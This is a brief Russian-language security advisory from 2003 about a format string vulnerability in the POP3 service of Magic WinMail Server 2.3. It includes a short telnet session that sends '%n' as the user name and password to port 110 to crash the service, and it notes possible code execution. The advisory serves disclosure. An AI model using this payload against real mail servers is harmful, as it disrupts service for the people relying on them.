Уязвимость форматной строки в Magic WinMail Server позволяет удаленному пользователю аварийно завершить работу POP3 сервиса

Дата публикации:28.05.2003
Всего просмотров:834
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Winmail Server 2.x
Описание: Уязвимость обнаружена в Magic WinMail Server. Удаленный пользователь может аварийно завершить работу почтовой службы.

Уязвимость форматной строки обнаружена в POP3 сервисе. Удаленный пользователь может подключиться к POP3 сервису на 110 TCP порту и послать строку формата вместо имени пользователя и пароля, чтобы аварийно завершить работу сервиса. Пример:

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed
Возможно уязвимость может использоваться для выполнения произвольного кода с system привилегиями.

Уязвимость обнаружена в Magic WinMail Server 2.3

Ссылки: Magic Winmail Server v.2.*: format string